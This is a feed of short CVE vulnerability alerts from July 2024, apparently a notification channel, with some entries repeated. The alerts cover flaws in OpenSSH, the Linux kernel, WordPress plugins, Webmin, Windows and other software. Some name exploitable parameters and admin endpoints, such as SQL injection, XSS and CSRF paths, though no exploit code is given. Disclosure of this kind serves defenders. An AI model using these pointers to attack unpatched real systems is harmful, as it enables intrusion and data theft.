🚨 CVE-2024-26621In the Linux kernel, the following vulnerability has been resolved:mm: huge_memory: don't force huge page alignment on 32 bitcommit efa7df3e3bb5 ("mm: align larger anonymous mappings on THPboundaries") caused two issues [1] [2] reported on 32 bit system or compatuserspace.It doesn't make too much sense to force huge page alignment on 32 bitsystem due to the constrained virtual address space.[1] https://lore.kernel.org/linux-mm/d0a136a0-4a31-46bc-adf4-2db109a61672@kernel.org/[2] https://lore.kernel.org/linux-mm/CAJuCfpHXLdQy1a2B6xN2d7quTYwg2OoZseYPZTRpU0eHHKD-sQ@mail.gmail.com/🎖@cveNotify |
|
| 2024-07-10 22:37:24 |
🚨 CVE-2023-41915OpenPMIx PMIx before 4.2.6 and 5.0.x before 5.0.1 allows attackers to obtain ownership of arbitrary files via a race condition during execution of library code with UID 0.🎖@cveNotify |
|
| 2024-07-10 20:37:32 |
🚨 CVE-2024-37149GLPI is an open-source asset and IT management software package that provides ITIL Service Desk features, licenses tracking and software auditing. An authenticated technician user can upload a malicious PHP script and hijack the plugin loader to execute this malicious script. Upgrade to 10.0.16.🎖@cveNotify |
|
| 2024-07-10 20:37:25 |
🚨 CVE-2024-25076An issue was discovered on Renesas SmartBond DA14691, DA14695, DA14697, and DA14699 devices. The bootrom function responsible for validating the Flash Product Header directly uses a user-controllable size value (Length of Flash Config Section) to control a read from the QSPI device into a fixed sized buffer, resulting in a buffer overflow and execution of arbitrary code.🎖@cveNotify |
|
| 2024-07-10 20:37:24 |
🚨 CVE-2023-51105A floating point exception (divide-by-zero) vulnerability was discovered in Artifex MuPDF 1.23.4 in function bmp_decompress_rle4() of load-bmp.c.🎖@cveNotify |
|
| 2024-07-10 19:37:38 |
🚨 CVE-2024-5913An improper input validation vulnerability in Palo Alto Networks PAN-OS software enables an attacker with the ability to tamper with the physical file system to elevate privileges.🎖@cveNotify |
|
| 2024-07-10 19:37:31 |
🚨 CVE-2024-5912An improper file signature check in Palo Alto Networks Cortex XDR agent may allow an attacker to bypass the Cortex XDR agent's executable blocking capabilities and run untrusted executables on the device. This issue can be leveraged to execute untrusted software without being detected or blocked.🎖@cveNotify |
|
| 2024-07-10 19:37:30 |
🚨 CVE-2024-5491Denial of Service in NetScaler ADC and NetScaler Gateway in NetScaler🎖@cveNotify |
|
| 2024-07-10 19:37:26 |
🚨 CVE-2024-32469Decidim is a participatory democracy framework. The pagination feature used in searches and filters is subject to potential XSS attack through a malformed URL using the GET parameter `per_page`. This vulnerability is fixed in 0.27.6 and 0.28.1.🎖@cveNotify |
|
| 2024-07-10 19:37:25 |
🚨 CVE-2024-27090Decidim is a participatory democracy framework, written in Ruby on Rails, originally developed for the Barcelona City government online and offline participation website. If an attacker can infer the slug or URL of an unpublished or private resource, and this resource can be embbeded (such as a Participatory Process, an Assembly, a Proposal, a Result, etc), then some data of this resource could be accessed. This vulnerability is fixed in 0.27.6.🎖@cveNotify |
|
| 2024-07-10 19:37:24 |
🚨 CVE-2024-20399A vulnerability in the CLI of Cisco NX-OS Software could allow an authenticated, local attacker to execute arbitrary commands as root on the underlying operating system of an affected device. This vulnerability is due to insufficient validation of arguments that are passed to specific configuration CLI commands. An attacker could exploit this vulnerability by including crafted input as the argument of an affected configuration CLI command. A successful exploit could allow the attacker to execute arbitrary commands on the underlying operating system with the privileges of root. Note: To successfully exploit this vulnerability on a Cisco NX-OS device, an attacker must have Administrator credentials.🎖@cveNotify |
|
| 2024-07-10 17:37:31 |
🚨 CVE-2024-6644A vulnerability was found in zmops ArgusDBM up to 0.1.0. It has been classified as critical. Affected is the function getDefaultClassLoader of the file CalculateAlarm.java of the component AviatorScript Handler. The manipulation leads to deserialization. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-271050 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-07-10 17:37:30 |
🚨 CVE-2024-5178ServiceNow has addressed a sensitive file read vulnerability that was identified in the Washington DC, Vancouver, and Utah Now Platform releases. This vulnerability could allow an administrative user to gain unauthorized access to sensitive files on the web application server. The vulnerability is addressed in the listed patches and hot fixes, which were released during the June 2024 patching cycle. If you have not done so already, we recommend applying security patches relevant to your instance as soon as possible.🎖@cveNotify |
|
| 2024-07-10 17:37:26 |
🚨 CVE-2024-3325Vulnerability in Jaspersoft JasperReport Servers.This issue affects JasperReport Servers: from 8.0.4 through 9.0.0.🎖@cveNotify |
|
| 2024-07-10 17:37:25 |
🚨 CVE-2024-6409A signal handler race condition vulnerability was found in OpenSSH's server (sshd) in Red Hat Enterprise Linux 9, where a client does not authenticate within LoginGraceTime seconds (120 by default, 600 in old OpenSSH versions), then sshd's SIGALRM handler is called asynchronously. However, this signal handler calls various functions that are not async-signal-safe, for example, syslog(). This issue leaves it vulnerable to a signal handler race condition on the cleanup_exit() function, which introduces the same vulnerability as CVE-2024-6387 in the unprivileged child of the SSHD server. As a consequence of a successful attack, in the worst case scenario, the attacker may be able to perform a remote code execution (RCE) within unprivileged user running the sshd server. This vulnerability affects only the sshd server shipped with Red Hat Enterprise Linux 9, while upstream versions of sshd are not impact by this flaw.🎖@cveNotify |
|
| 2024-07-10 17:37:24 |
🚨 CVE-2024-6387A security regression (CVE-2006-5051) was discovered in OpenSSH's server (sshd). There is a race condition which can lead to sshd to handle some signals in an unsafe manner. An unauthenticated, remote attacker may be able to trigger it by failing to authenticate within a set time period.🎖@cveNotify |
|
| 2024-07-10 16:37:32 |
🚨 CVE-2024-40412Tenda AX12 v1.0 v22.03.01.46 contains a stack overflow in the deviceList parameter of the sub_42E410 function.🎖@cveNotify |
|
| 2024-07-10 16:37:31 |
🚨 CVE-2023-35006IBM Security QRadar EDR 3.12 is vulnerable to HTML injection. A remote attacker could inject malicious HTML code, which when viewed, would be executed in the victim's Web browser within the security context of the hosting site. IBM X-Force ID: 297165.🎖@cveNotify |
|
| 2024-07-10 16:37:27 |
🚨 CVE-2023-33860IBM Security QRadar EDR 3.12 does not set the secure attribute on authorization tokens or session cookies. Attackers may be able to get the cookie values by sending a http:// link to a user or by planting this link in a site the user goes to. The cookie will be sent to the insecure link and the attacker can then obtain the cookie value by snooping the traffic. IBM X-Force ID: 257702.🎖@cveNotify |
|
| 2024-07-10 16:37:26 |
🚨 CVE-2024-6409A signal handler race condition vulnerability was found in OpenSSH's server (sshd) in Red Hat Enterprise Linux 9, where a client does not authenticate within LoginGraceTime seconds (120 by default, 600 in old OpenSSH versions), then sshd's SIGALRM handler is called asynchronously. However, this signal handler calls various functions that are not async-signal-safe, for example, syslog(). This issue leaves it vulnerable to a signal handler race condition on the cleanup_exit() function, which introduces the same vulnerability as CVE-2024-6387 in the unprivileged child of the SSHD server. As a consequence of a successful attack, in the worst case scenario, the attacker may be able to perform a remote code execution (RCE) within unprivileged user running the sshd server. This vulnerability affects only the sshd server shipped with Red Hat Enterprise Linux 9, while upstream versions of sshd are not impact by this flaw.🎖@cveNotify |
|
| 2024-07-10 16:37:25 |
🚨 CVE-2023-46049LLVM 15.0.0 has a NULL pointer dereference in the parseOneMetadata() function via a crafted pdflatex.fmt file (or perhaps a crafted .o file) to llvm-lto. NOTE: this is disputed because the relationship between pdflatex.fmt and any LLVM language front end is not explained, and because a crash of the llvm-lto application should be categorized as a usability problem.🎖@cveNotify |
|
| 2024-07-10 15:37:25 |
🚨 CVE-2023-45919Mesa 23.0.4 was discovered to contain a buffer over-read in glXQueryServerString(). NOTE: this is disputed because there are no common situations in which users require uninterrupted operation with an attacker-controller server.🎖@cveNotify |
|
| 2024-07-10 15:37:24 |
🚨 CVE-2014-0069The cifs_iovec_write function in fs/cifs/file.c in the Linux kernel through 3.13.5 does not properly handle uncached write operations that copy fewer than the requested number of bytes, which allows local users to obtain sensitive information from kernel memory, cause a denial of service (memory corruption and system crash), or possibly gain privileges via a writev system call with a crafted pointer.🎖@cveNotify |
|
| 2024-07-10 14:37:31 |
🚨 CVE-2024-40332idccms v1.35 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via /admin/moneyRecord_deal.php?mudi=delRecord🎖@cveNotify |
|
| 2024-07-10 14:37:30 |
🚨 CVE-2020-22628Buffer Overflow vulnerability in LibRaw::stretch() function in libraw\src\postprocessing\aspect_ratio.cpp.🎖@cveNotify |
|
| 2024-07-10 14:37:26 |
🚨 CVE-2016-7536magick/profile.c in ImageMagick allows remote attackers to cause a denial of service (segmentation fault) via a crafted profile.🎖@cveNotify |
|
| 2024-07-10 14:37:25 |
🚨 CVE-2016-7537MagickCore/memory.c in ImageMagick allows remote attackers to cause a denial of service (out-of-bounds access) via a crafted PDB file.🎖@cveNotify |
|
| 2024-07-10 14:07:25 |
🚨 CVE-2024-38080Windows Hyper-V Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-07-10 14:07:24 |
🚨 CVE-2024-23692Rejetto HTTP File Server, up to and including version 2.3m, is vulnerable to a template injection vulnerability. This vulnerability allows a remote, unauthenticated attacker to execute arbitrary commands on the affected system by sending a specially crafted HTTP request. As of the CVE assignment date, Rejetto HFS 2.3m is no longer supported.🎖@cveNotify |
|
| 2024-07-10 12:37:25 |
🚨 CVE-2024-3799Insecure handling of POST header parameter body included in requests being sent to an instance of the open-source project Phoniebox allows an attacker to create a website, which – when visited by a user – will send malicious requests to multiple hosts on the local network. If such a request reaches the server, it will cause a shell command execution.This issue affects Phoniebox in all releases through 2.7. Newer releases were not tested, but they might also be vulnerable.🎖@cveNotify |
|
| 2024-07-10 12:37:24 |
🚨 CVE-2024-3798Insecure handling of GET header parameter file included in requests being sent to an instance of the open-source project Phoniebox allows an attacker to create a website, which – when visited by a user – will send malicious requests to multiple hosts on the local network. If such a request reaches the server, it will cause one of the following (depending on the chosen payload): shell command execution, reflected XSS or cross-site request forgery.This issue affects Phoniebox in all releases through 2.7. Newer releases were not tested, but they might also be vulnerable.🎖@cveNotify |
|
| 2024-07-10 09:37:25 |
🚨 CVE-2024-6556The SmartCrawl WordPress SEO checker, SEO analyzer, SEO optimizer plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 3.10.8. This is due the plugin utilizing mobiledetect without preventing direct access to the files. This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website.🎖@cveNotify |
|
| 2024-07-10 09:37:24 |
🚨 CVE-2024-26279The wrapper extensions do not correctly validate inputs, leading to XSS vectors.🎖@cveNotify |
|
| 2024-07-10 08:37:25 |
🚨 CVE-2023-6813The Login by Auth0 plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘wle’ parameter in all versions up to, and including, 4.6.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-07-10 07:37:30 |
🚨 CVE-2024-39927Out-of-bounds write vulnerability exists in Ricoh MFPs and printers. If a remote attacker sends a specially crafted request to the affected products, the products may be able to cause a denial-of-service (DoS) condition and/or user's data may be destroyed.🎖@cveNotify |
|
| 2024-07-10 07:37:26 |
🚨 CVE-2024-36453Cross-site scripting vulnerability exists in session_login.cgi of Webmin versions prior to 1.970 and Usermin versions prior to 1.820. If this vulnerability is exploited, an arbitrary script may be executed on the web browser of the user who accessed the website using the product. As a result, a webpage may be altered or sensitive information such as a credential may be disclosed.🎖@cveNotify |
|
| 2024-07-10 07:37:25 |
🚨 CVE-2024-36451Improper handling of insufficient permissions or privileges vulnerability exists in ajaxterm module of Webmin prior to 2.003. If this vulnerability is exploited, a console session may be hijacked by an unauthorized user. As a result, data within a system may be referred, a webpage may be altered, or a server may be permanently halted.🎖@cveNotify |
|
| 2024-07-10 07:37:24 |
🚨 CVE-2024-36450Cross-site scripting vulnerability exists in sysinfo.cgi of Webmin versions prior to 1.910. If this vulnerability is exploited, an arbitrary script may be executed on the web browser of the user who accessed the website using the product. As a result, a session ID may be obtained, a webpage may be altered, or a server may be halted.🎖@cveNotify |
|
| 2024-07-10 05:37:35 |
🚨 CVE-2024-6410The ProfileGrid – User Profiles, Groups and Communities plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 5.8.9 via the 'pm_upload_image' function due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Subscriber-level access and above, to change the profile picture of any user.🎖@cveNotify |
|
| 2024-07-10 05:37:31 |
🚨 CVE-2024-39330An issue was discovered in Django 5.0 before 5.0.7 and 4.2 before 4.2.14. Derived classes of the django.core.files.storage.Storage base class, when they override generate_filename() without replicating the file-path validations from the parent class, potentially allow directory traversal via certain inputs during a save() call. (Built-in Storage sub-classes are unaffected.)🎖@cveNotify |
|
| 2024-07-10 05:37:30 |
🚨 CVE-2024-21526All versions of the package speaker are vulnerable to Denial of Service (DoS) when providing unexpected input types to the channels property of the Speaker object makes it possible to reach an assert macro. Exploiting this vulnerability can lead to a process crash.🎖@cveNotify |
|
| 2024-07-10 05:37:26 |
🚨 CVE-2024-21525All versions of the package node-twain are vulnerable to Improper Check or Handling of Exceptional Conditions due to the length of the source data not being checked. Creating a new twain.TwainSDK with a productName or productFamily, manufacturer, version.info property of length >= 34 chars leads to a buffer overflow vulnerability.🎖@cveNotify |
|
| 2024-07-10 05:37:25 |
🚨 CVE-2024-21522All versions of the package audify are vulnerable to Improper Validation of Array Index when frameSize is provided to the new OpusDecoder().decode or new OpusDecoder().decodeFloat functions it is not checked for negative values. This can lead to a process crash.🎖@cveNotify |
|
| 2024-07-10 05:37:24 |
🚨 CVE-2024-21521All versions of the package @discordjs/opus are vulnerable to Denial of Service (DoS) due to providing an input object with a property toString to several different functions. Exploiting this vulnerability could lead to a system crash.🎖@cveNotify |
|
| 2024-07-10 04:37:24 |
🚨 CVE-2023-51105A floating point exception (divide-by-zero) vulnerability was discovered in Artifex MuPDF 1.23.4 in function bmp_decompress_rle4() of load-bmp.c.🎖@cveNotify |
|
| 2024-07-10 03:37:25 |
🚨 CVE-2024-38301Dell Alienware Command Center, version 5.7.3.0 and prior, contains an improper access control vulnerability. A low privileged attacker could potentially exploit this vulnerability, leading to denial of service on the local system and information disclosure.🎖@cveNotify |
|
| 2024-07-10 03:37:24 |
🚨 CVE-2023-32467Dell Edge Gateway BIOS, versions 3200 and 5200, contains an out-of-bounds write vulnerability. A local authenticated malicious user with high privileges could potentially exploit this vulnerability leading to exposure of some UEFI code, leading to arbitrary code execution or escalation of privilege.🎖@cveNotify |
|
| 2024-07-10 02:37:32 |
🚨 CVE-2024-5792The Houzez CRM plugin for WordPress is vulnerable to time-based SQL Injection via the notes ‘belong_to’ parameter in all versions up to, and including, 1.4.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Custom-level (seller) access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.🎖@cveNotify |
|
| 2024-07-10 02:37:25 |
🚨 CVE-2024-22018A vulnerability has been identified in Node.js, affecting users of the experimental permission model when the --allow-fs-read flag is used.This flaw arises from an inadequate permission model that fails to restrict file stats through the fs.lstat API. As a result, malicious actors can retrieve stats from files that they do not have explicit read access to.This vulnerability affects all users using the experimental permission model in Node.js 20 and Node.js 21.Please note that at the time this CVE was issued, the permission model is an experimental feature of Node.js.🎖@cveNotify |
|
| 2024-07-10 02:37:24 |
🚨 CVE-2023-7061The Advanced File Manager Shortcodes plugin for WordPress is vulnerable to arbitrary file uploads in all versions up to, and including, 2.5.3. This makes it possible for authenticated attackers with contributor access or above to upload arbitrary files on the affected site's server which may make remote code execution possible.🎖@cveNotify |
|
| 2024-07-10 01:37:26 |
🚨 CVE-2024-6433Relative Path Traversal in GitHub repository stitionai/devika prior to -.🎖@cveNotify |
|
| 2024-07-10 01:37:25 |
🚨 CVE-2024-6409A signal handler race condition vulnerability was found in OpenSSH's server (sshd) in Red Hat Enterprise Linux 9, where a client does not authenticate within LoginGraceTime seconds (120 by default, 600 in old OpenSSH versions), then sshd's SIGALRM handler is called asynchronously. However, this signal handler calls various functions that are not async-signal-safe, for example, syslog(). This issue leaves it vulnerable to a signal handler race condition on the cleanup_exit() function, which introduces the same vulnerability as CVE-2024-6387 in the unprivileged child of the SSHD server. As a consequence of a successful attack, in the worst case scenario, the attacker may be able to perform a remote code execution (RCE) within unprivileged user running the sshd server. This vulnerability affects only the sshd server shipped with Red Hat Enterprise Linux 9, while upstream versions of sshd are not impact by this flaw.🎖@cveNotify |
|
| 2024-07-10 01:37:24 |
🚨 CVE-2024-6387A security regression (CVE-2006-5051) was discovered in OpenSSH's server (sshd). There is a race condition which can lead to sshd to handle some signals in an unsafe manner. An unauthenticated, remote attacker may be able to trigger it by failing to authenticate within a set time period.🎖@cveNotify |
|
| 2024-07-10 01:07:25 |
🚨 CVE-2024-38112Windows MSHTML Platform Spoofing Vulnerability🎖@cveNotify |
|
| 2024-07-10 01:07:24 |
🚨 CVE-2024-23692Rejetto HTTP File Server, up to and including version 2.3m, is vulnerable to a template injection vulnerability. This vulnerability allows a remote, unauthenticated attacker to execute arbitrary commands on the affected system by sending a specially crafted HTTP request. As of the CVE assignment date, Rejetto HFS 2.3m is no longer supported.🎖@cveNotify |
|
| 2024-07-10 00:37:24 |
🚨 CVE-2024-39880Delta Electronics CNCSoft-G2 lacks proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. If a target visits a malicious page or opens a malicious file an attacker can leverage this vulnerability to execute code in the context of the current process.🎖@cveNotify |
|
| 2024-07-09 23:37:25 |
🚨 CVE-2024-22377The deploy directory in PingFederate runtime nodes is reachable to unauthorized users.🎖@cveNotify |
|
| 2024-07-09 23:37:24 |
🚨 CVE-2024-23692Rejetto HTTP File Server, up to and including version 2.3m, is vulnerable to a template injection vulnerability. This vulnerability allows a remote, unauthenticated attacker to execute arbitrary commands on the affected system by sending a specially crafted HTTP request. As of the CVE assignment date, Rejetto HFS 2.3m is no longer supported.🎖@cveNotify |
|
| 2024-07-09 22:37:32 |
🚨 CVE-2024-39069An issue in ifood Order Manager v3.35.5 'Gestor de Peddios.exe' allows attackers to execute arbitrary code via a DLL hijacking attack.🎖@cveNotify |
|
| 2024-07-09 22:37:25 |
🚨 CVE-2024-35154IBM WebSphere Application Server 8.5 and 9.0 could allow a remote authenticated attacker, who has authorized access to the administrative console, to execute arbitrary code. Using specially crafted input, the attacker could exploit this vulnerability to execute arbitrary code on the system. IBM X-Force ID: 292641.🎖@cveNotify |
|
| 2024-07-09 22:37:24 |
🚨 CVE-2024-3596RADIUS Protocol under RFC 2865 is susceptible to forgery attacks by a local attacker who can modify any valid Response (Access-Accept, Access-Reject, or Access-Challenge) to any other response using a chosen-prefix collision attack against MD5 Response Authenticator signature.🎖@cveNotify |
|
| 2024-07-09 21:37:32 |
🚨 CVE-2024-23695In CacheOpPMRExec of cache_km.c, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege in the kernel with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-07-09 21:37:25 |
🚨 CVE-2023-51104A floating point exception (divide-by-zero) vulnerability was discovered in Artifex MuPDF 1.23.4 in function pnm_binary_read_image() of load-pnm.c when span equals zero.🎖@cveNotify |
|
| 2024-07-09 21:37:24 |
🚨 CVE-2023-21266In multiple functions of ActivityManagerService.java, there is a possible way to escape Google Play protection due to a permissions bypass. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-07-09 20:37:32 |
🚨 CVE-2024-36075The CoSoSys Endpoint Protector through 5.9.3 and Unify agent through 7.0.6 is susceptible to an arbitrary code execution vulnerability due to the way an archive obtained from the Endpoint Protector or Unify server is extracted on the endpoint. An attacker who is able to modify the archive on the server could obtain remote code execution as an administrator on an endpoint.🎖@cveNotify |
|
| 2024-07-09 20:37:25 |
🚨 CVE-2023-5405Server information leak for the CDA Server process memory can occur when an error is generated in response to a specially crafted message. See Honeywell Security Notification for recommendations on upgrading and versioning.🎖@cveNotify |
|
| 2024-07-09 20:37:24 |
🚨 CVE-2023-5390An attacker could potentially exploit this vulnerability, leading to files being read from the Honeywell Experion ControlEdge VirtualUOC and ControlEdge UOC. This exploit could be used to read files from the controller that may expose limited information from the device. Honeywell recommends updating to the most recent version of the product. See Honeywell Security Notification for recommendations on upgrading and versioning.🎖@cveNotify |
|
| 2024-07-09 19:37:42 |
🚨 CVE-2024-40039idccms v1.35 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via /admin/userGroup_deal.php?mudi=del🎖@cveNotify |
|
| 2024-07-09 19:37:41 |
🚨 CVE-2024-40037idccms v1.35 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via /admin/userScore_deal.php?mudi=del🎖@cveNotify |
|
| 2024-07-09 19:37:37 |
🚨 CVE-2024-40035idccms v1.35 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via /admin/userLevel_deal.php?mudi=add.🎖@cveNotify |
|
| 2024-07-09 19:37:36 |
🚨 CVE-2024-40034idccms v1.35 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via /admin/userLevel_deal.php?mudi=del🎖@cveNotify |
|
| 2024-07-09 19:37:35 |
🚨 CVE-2024-39897zot is an OCI image registry. Prior to 2.1.0, the cache driver `GetBlob()` allows read access to any blob without access control check. If a Zot `accessControl` policy allows users read access to some repositories but restricts read access to other repositories and `dedupe` is enabled (it is enabled by default), then an attacker who knows the name of an image and the digest of a blob (that they do not have read access to), they may maliciously read it via a second repository they do have read access to. This attack is possible because [`ImageStore.CheckBlob()` calls `checkCacheBlob()`](https://github.com/project-zot/zot/blob/v2.1.0-rc2/pkg/storage/imagestore/imagestore.go#L1158-L1159) to find the blob a global cache by searching for the digest. If it is found, it is copied to the user requested repository with `copyBlob()`. The attack may be mitigated by configuring "dedupe": false in the "storage" settings. The vulnerability is fixed in 2.1.0.🎖@cveNotify |
|
| 2024-07-09 19:37:31 |
🚨 CVE-2024-38517Tencent RapidJSON is vulnerable to privilege escalation due to an integer underflow in the `GenericReader::ParseNumber()` function of `include/rapidjson/reader.h` when parsing JSON text from a stream. An attacker needs to send the victim a crafted file which needs to be opened; this triggers the integer underflow vulnerability (when the file is parsed), leading to elevation of privilege.🎖@cveNotify |
|
| 2024-07-09 19:37:30 |
🚨 CVE-2024-34123Premiere Pro versions 23.6.5, 24.4.1 and earlier are affected by an Untrusted Search Path vulnerability that could lead to arbitrary code execution. An attacker could exploit this vulnerability by inserting a malicious file into the search path, which the application might execute instead of the legitimate file. This could occur when the application uses a search path to locate executables or libraries. Exploitation of this issue requires user interaction, attack complexity is high.🎖@cveNotify |
|
| 2024-07-09 19:37:29 |
🚨 CVE-2023-50807A vulnerability was discovered in Samsung Wearable Processor and Modems with versions Exynos 9110, Exynos Modem 5123, Exynos Modem 5300 that allows an out-of-bounds write in the heap in 2G (no auth).🎖@cveNotify |
|
| 2024-07-09 19:37:26 |
🚨 CVE-2023-50806A vulnerability was discovered in Samsung Mobile Processor, Wearable Processor, and Modems with versions Exynos 9820, Exynos 9825, Exynos 980, Exynos 990, Exynos 850 Exynos 1080, Exynos 2100, Exynos 2200, Exynos 1280, Exynos 1380 Exynos 1330, Exynos 9110, Exynos W920, Exynos W930, Exynos Modem 5123, Exynos Modem 5300 that allows out-of-bounds access to a heap buffer in the SIM Proactive Command.🎖@cveNotify |
|
| 2024-07-09 19:37:25 |
🚨 CVE-2024-36843libmodbus v3.1.6 was discovered to contain a heap overflow via the modbus_mapping_free() function.🎖@cveNotify |
|
| 2024-07-09 19:37:24 |
🚨 CVE-2024-31982XWiki Platform is a generic wiki platform. Starting in version 2.4-milestone-1 and prior to versions 4.10.20, 15.5.4, and 15.10-rc-1, XWiki's database search allows remote code execution through the search text. This allows remote code execution for any visitor of a public wiki or user of a closed wiki as the database search is by default accessible for all users. This impacts the confidentiality, integrity and availability of the whole XWiki installation. This vulnerability has been patched in XWiki 14.10.20, 15.5.4 and 15.10RC1. As a workaround, one may manually apply the patch to the page `Main.DatabaseSearch`. Alternatively, unless database search is explicitly used by users, this page can be deleted as this is not the default search interface of XWiki.🎖@cveNotify |
|
| 2024-07-09 19:07:24 |
🚨 CVE-2024-37260Server-Side Request Forgery (SSRF) vulnerability in Theme-Ruby Foxiz.This issue affects Foxiz: from n/a through 2.3.5.🎖@cveNotify |
|
| 2024-07-09 18:37:46 |
🚨 CVE-2021-31166HTTP Protocol Stack Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-07-09 18:37:45 |
🚨 CVE-2021-21551Dell dbutil_2_3.sys driver contains an insufficient access control vulnerability which may lead to escalation of privileges, denial of service, or information disclosure. Local authenticated user access is required.🎖@cveNotify |
|
| 2024-07-09 18:37:44 |
🚨 CVE-2017-0213Windows COM Aggregate Marshaler in Microsoft Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, and 1703, and Windows Server 2016 allows an elevation privilege vulnerability when an attacker runs a specially crafted application, aka "Windows COM Elevation of Privilege Vulnerability". This CVE ID is unique from CVE-2017-0214.🎖@cveNotify |
|
| 2024-07-09 18:37:43 |
🚨 CVE-2017-0148The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka "Windows SMB Remote Code Execution Vulnerability." This vulnerability is different from those described in CVE-2017-0143, CVE-2017-0144, CVE-2017-0145, and CVE-2017-0146.🎖@cveNotify |
|
| 2024-07-09 18:37:39 |
🚨 CVE-2016-7200The Chakra JavaScript scripting engine in Microsoft Edge allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Scripting Engine Memory Corruption Vulnerability," a different vulnerability than CVE-2016-7201, CVE-2016-7202, CVE-2016-7203, CVE-2016-7208, CVE-2016-7240, CVE-2016-7242, and CVE-2016-7243.🎖@cveNotify |
|
| 2024-07-09 18:37:38 |
🚨 CVE-2016-0151The Client-Server Run-time Subsystem (CSRSS) in Microsoft Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, and Windows 10 Gold and 1511 mismanages process tokens, which allows local users to gain privileges via a crafted application, aka "Windows CSRSS Security Feature Bypass Vulnerability."🎖@cveNotify |
|
| 2024-07-09 18:37:37 |
🚨 CVE-2016-0040The kernel in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, and Windows 7 SP1 allows local users to gain privileges via a crafted application, aka "Windows Elevation of Privilege Vulnerability."🎖@cveNotify |
|
| 2024-07-09 18:37:33 |
🚨 CVE-2015-2419JScript 9 in Microsoft Internet Explorer 10 and 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "JScript9 Memory Corruption Vulnerability."🎖@cveNotify |
|
| 2024-07-09 18:37:32 |
🚨 CVE-2013-1690Mozilla Firefox before 22.0, Firefox ESR 17.x before 17.0.7, Thunderbird before 17.0.7, and Thunderbird ESR 17.x before 17.0.7 do not properly handle onreadystatechange events in conjunction with page reloading, which allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted web site that triggers an attempt to execute data at an unmapped memory location.🎖@cveNotify |
|
| 2024-07-09 18:37:31 |
🚨 CVE-2013-2729Integer overflow in Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and 11.x before 11.0.03 allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2013-2727.🎖@cveNotify |
|
| 2024-07-09 18:37:27 |
🚨 CVE-2012-2539Microsoft Word 2003 SP3, 2007 SP2 and SP3, and 2010 SP1; Word Viewer; Office Compatibility Pack SP2 and SP3; and Office Web Apps 2010 SP1 allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted RTF data, aka "Word RTF 'listoverridecount' Remote Code Execution Vulnerability."🎖@cveNotify |
|
| 2024-07-09 18:37:26 |
🚨 CVE-2011-2005afd.sys in the Ancillary Function Driver in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 does not properly validate user-mode input passed to kernel mode, which allows local users to gain privileges via a crafted application, aka "Ancillary Function Driver Elevation of Privilege Vulnerability."🎖@cveNotify |
|
| 2024-07-09 18:07:25 |
🚨 CVE-2024-6095A vulnerability in the /models/apply endpoint of mudler/localai versions 2.15.0 allows for Server-Side Request Forgery (SSRF) and partial Local File Inclusion (LFI). The endpoint supports both http(s):// and file:// schemes, where the latter can lead to LFI. However, the output is limited due to the length of the error message. This vulnerability can be exploited by an attacker with network access to the LocalAI instance, potentially allowing unauthorized access to internal HTTP(s) servers and partial reading of local files. The issue is fixed in version 2.17.🎖@cveNotify |
|
| 2024-07-09 17:37:42 |
🚨 CVE-2024-21428SQL Server Native Client OLE DB Provider Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-07-09 17:37:41 |
🚨 CVE-2024-21415SQL Server Native Client OLE DB Provider Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-07-09 17:37:37 |
🚨 CVE-2024-21398SQL Server Native Client OLE DB Provider Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-07-09 17:37:36 |
🚨 CVE-2024-21335SQL Server Native Client OLE DB Provider Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-07-09 17:37:35 |
🚨 CVE-2024-21333SQL Server Native Client OLE DB Provider Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-07-09 17:37:32 |
🚨 CVE-2024-21332SQL Server Native Client OLE DB Provider Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-07-09 17:37:31 |
